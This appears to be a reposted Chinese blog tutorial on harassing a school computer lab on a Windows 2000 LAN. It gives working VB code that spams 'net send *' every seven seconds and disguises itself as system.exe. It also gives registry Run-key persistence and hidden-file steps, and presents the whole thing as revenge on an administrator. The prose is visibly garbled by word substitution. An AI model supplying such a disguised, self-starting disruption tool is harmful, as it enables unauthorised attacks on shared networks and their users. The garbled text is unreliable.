Netsend + VB 小闹win2000局域网

  学校最近新建了个机房，来了一位新网管，但是没几天，这位新办理员就惹出“公愤”，原因是这位所谓的网管基础就没什么真本领，系里几位盘算机喜好者窜改一下系统设置，她就少见多怪地说“不要随便动机子设置，显什么显？就你会盘算机?!”，有一次，暗黑之雪发现学校机子险些全部中了“高兴时光”病毒，好心美意地查杀病毒，她竟然说“你不要随便删除东西哦！”，雪说“这机子有病毒啊！”，她说“没什么大不了的！”（真实之雨晕~~~~~~~），真是菜到家了！
  就这样引起大家的公愤，大家一直要求处罚她。
  雪：“TOON，想个办法整整她！”
  其别人：“对对，折腾一下她！”
  真实之雨：“好啊，我把他保举给xxx三级片的导演让她去演三级片！”
  众人 倒~~~~~~~~~~~~~~~，“我们不是要这样做！”
  真实之雨：“嘿嘿，晓得了！晓得了！我来搞定她！”
  3天后，学校的机房出现怪征象，无法正常利用，嘿嘿，那位真才实学的办理员无奈只好请妙手出头具名才搞好。 嘿嘿，那么真实之雨是如何折腾的呢？ 雕虫小技罢了啦！
  大家晓得，由WIN2000组成的局域网下有个net send 命令用于在局域网内传送信息，举比方下：
  比如在 kof 这个事情组中有个 名为 toon 的盘算机，那么我们如今要给这台机子发信息，就“开端”---“运转”--- net send toon 你好, 运转完毕后就会出现一个DOS窗口，发送完毕后，该窗口会自动封闭，也可以进入DOS 直接运转输出运转这个命令！成功后会有提示：
  音讯已经送到 192.168.0.1(假设这是名为 toon 的盘算机的IP地点）
  款式总结出来就是这样: net send 盘算机称号大概IP地点 信息 (注意款式肯定要精确否则不会成功！，该有空格的中央肯定要空格！）
  而收到信息的机子则这样表现：（倘使你的盘算机称号是 真实之雨）
  ++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  信使服务 +
  +
  从真实之雨到2003-4-11:0:16:41 上 192.168.0.1的信息 +
  +
  你好 +
  +
  ++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  看懂了吧，不必多说，经过这条信息，可以看到谁给你发送的信息以及你的IP地点(192.168.0.1).
  以上只是给单个用户发送信息，倘使我们要向所有的人发送呢？款式如下：
  net send * 哈哈
  OK！这样所有的人就都市收到这一信息。看到这里估计你也晓得我要做什么了！就是不停地给所有人发信息到达令网络内所有人不可正常利用的目标！
  不过我当然不至于傻到本身在机房找台机子整天发信息，况且这样做也就是暴漏本身！如今我就有请VB进场来帮我到达这个目标.
  1。在VB中新创建一工程---标准EXE。
  2。利用 TIMER 控件，将其 interval 属性设置为 7000。
  3。输出代码：
  Private Sub Timer1_Timer()
  Shell "net send * IP地点辩论", vbHide
  End Sub
  Private Sub Form_Load()
  Form1.Hide
  End Sub
  好！如今找个象WIN2000系统文件的图标，把FORM的ICON 设置为这个图标文件，然后修改工程称号，改为system,然后天生EXE文件。天生的是system.exe（这些事情都是为了调皮地隐藏！）
  OK！我们在VB中的事情就做到这里，如今我们再接着来：
  4。在一个文本文件里输出：
  Windows Registry Editor Version 5.00
  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
  "winsystem"="C:\\WINNT\\system.exe"
  另存为 eva.reg ,只需是REG文件就好，名字是什么你本身随便了！
  5。把system.exe 放到 C:\WINNT 文件夹里，设置属性为 隐藏和只读。如果这机子上设置的是不表现隐藏文件和文件夹，那么革新后就看不见了。
  6。双击刚才我们保存的REG文件，系统提示能否将其内容写入注册表，点“是”。
  OK!我们大功告成！如今把这机子关了，快闪人吧！嘿嘿，等下次启动就有好戏看了！这台机子会不停地每隔7秒向所有盘算机发送一次信息，够烦人的吧！我的一同学正在玩CS的时候收到这信息，突然就一下子加入来了，然后等他点完确定再回到CS，他已经壮烈牺牲了！呵呵！气得他痛骂呢。
  下面我细致说一下原理，起首说一下VB中的SHELL 函数，凡可在DOS和WINDOWS下运转的程序都可以利用它来挪用。款式如下：
  shell (pathname[,windowstyle])
  pathname 是包含在双引号中的可实行程序的途径。
  windowstyle 为可选参数，vbHide 就是隐藏被挪用程序。
  实际上除了可以挪用程序外，DOS命令和REG注册表文件，也可以被SHELL函数挪用。所以 下面的VB程序实际上就是挪用NETSEND命令，并且为了不被看出是在做什么，设置挪用该命令时隐藏DOS窗口！
  至于TIMER ，打仗过VB控件的朋侪应该很清楚，就是隔多少工夫实行一次，这里设置其 interval 属性设置为 7000，也就是每7秒实行一次了！至于 Form1.Hide，则是为了在程序启动的时候隐藏本身。WIN2000本身的进程中有一个肯定的sysytem进程，所以这里为了调皮地隐藏也修自新工程称号和图标，以及EXE文件 称号，让检察进程的人曲解为这是WIN2000的系统进程！
  而厥后天生的REG（注册表文件），是为了将该程序写入系统启动里，这样每次刊出大概重新启动都市运转该程序！其实VB中可以挪用API函数来直接读写注册表，这里我只是省事罢了。
  OK！我们就等着看好戏，呵呵，大概你要问我，这样做岂不是连我要在机房利用机子也会受到骚扰？呵呵，我自然有办法了！就是运转一个命令回绝接受信息，如下：
  net stop messenger
  OK!倘使你是在DOS里直接输出的这命令，那么你还会看到提示信息：
  Messenger 服务正在制止.
  Messenger 服务已成功制止。
  这样我就不会受到骚扰了！如果你想再开启这个信息服务，则运转：
  net start messenger
  呵呵，就这样，我用小伎俩处罚了这个傲气的办理员，同道们笑了！樱花开了！:) 就说到这里吧，有疑问的话可以接洽我，QQ: 147394763
  向所有的黑客们致敬！下次再见！:)
 

文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明：原创作品，允许转载，转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

评论加载中... 内容： 评论者： 验证码：